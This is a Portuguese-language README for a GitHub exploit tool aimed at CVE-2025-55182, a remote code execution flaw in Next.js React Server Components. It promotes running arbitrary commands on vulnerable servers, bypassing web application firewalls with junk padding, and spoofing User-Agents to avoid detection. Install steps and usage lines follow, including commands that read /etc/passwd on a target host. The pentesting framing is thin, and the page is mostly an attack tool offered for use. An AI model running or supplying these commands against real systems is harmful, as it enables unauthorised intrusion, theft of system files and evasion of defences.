
Ferramenta automatizada de exploração para CVE-2025-55182 no Next.js React Server Components. Permite execução remota de comandos com bypass de WAF integrado, cabeçalhos personalizados e varredura em lote para teste de penetração.
Uma ferramenta de exploração poderosa para detetar e explorar a vulnerabilidade CVE-2025-55182 nos React Server Components do Next.js. Esta ferramenta permite a execução remota de comandos (RCE) em aplicações Next.js vulneráveis, com capacidades integradas de bypass de WAF.

CVE-2025-55182 é uma vulnerabilidade crítica nos React Server Components do Next.js que permite a atacantes remotos executar comandos arbitrários em servidores vulneráveis. Esta ferramenta fornece uma forma automatizada de detetar e explorar esta vulnerabilidade.
Execução Remota de Comandos: Execute comandos arbitrários em servidores Next.js vulneráveis
Bypass de WAF: Bypass integrado de Firewall de Aplicação Web com dados de lixo configuráveis
Suporte a Headers Personalizados: Adicione cabeçalhos HTTP personalizados para autenticação ou outros fins
Segmentação Flexível: Suporte para alvos únicos e análise em lote
Suporte a Múltiplos Protocolos: Deteção e tratamento automáticos de HTTPS/HTTP
Timeouts Personalizáveis: Timeouts de pedido configuráveis para diferentes condições de rede
Controlo de Verificação SSL: Opção para desativar a verificação de certificados SSL
User-Agents Personalizados: Falsifique user agents para evitar deteção
# Clone o repositório
git clone https://github.com/Dh4v4l8/CVE-2025-55182-poc-tool.git
cd CVE-2025-55182-poc-tool
# Torne o script executável
chmod +x exploit.sh
# Teste a instalação
./exploit.sh -h
A ferramenta expõe várias opções de linha de comando que permitem aos investigadores personalizar pedidos, simular tráfego ou testar camadas de filtragem.
Uso: ./exploit.sh [OPÇÕES]
Opções:
-d, --domain Domínio/URL alvo (padrão: http://localhost:3000)
Se nenhum protocolo for especificado, assume https://
-c, --command Comando a executar (padrão: id)
-w, --waf-bypass Ativar bypass de WAF com dados de lixo (padrão: 128KB)
--waf-size SIZE Tamanho dos dados de bypass de WAF em KB (padrão: 128)
--timeout SECONDS Timeout do pedido em segundos (padrão: 15)
-k, --insecure Desativar verificação de certificado SSL
--user-agent AGENT String de User-Agent personalizada
-h, --help Mostrar esta mensagem de ajuda
# Verificar se o alvo é vulnerável com o comando padrão
./exploit.sh -d https://target.com
# Executar comando personalizado
./exploit.sh -d https://target.com -c "whoami"
# Ler ficheiros do sistema
./exploit.sh -d https://target.com -c "cat /etc/passwd"
# Ativar bypass de WAF
./exploit.sh -d https://target.com -c "ls -la" -w
# Tamanho personalizado de bypass de WAF (256KB)
./exploit.sh -d https://target.com -c "cat /etc/passwd" -w --waf-size 256
# Desativar verificação SSL
./exploit.sh -d https://target.com -c "id" -k
# Timeout personalizado
./exploit.sh -d https://target.com -c "ping -c 3 google.com" --timeout 30
# User-Agent personalizado
./exploit.sh -d https://target.com -c "id" --user-agent "CustomScanner/1.0"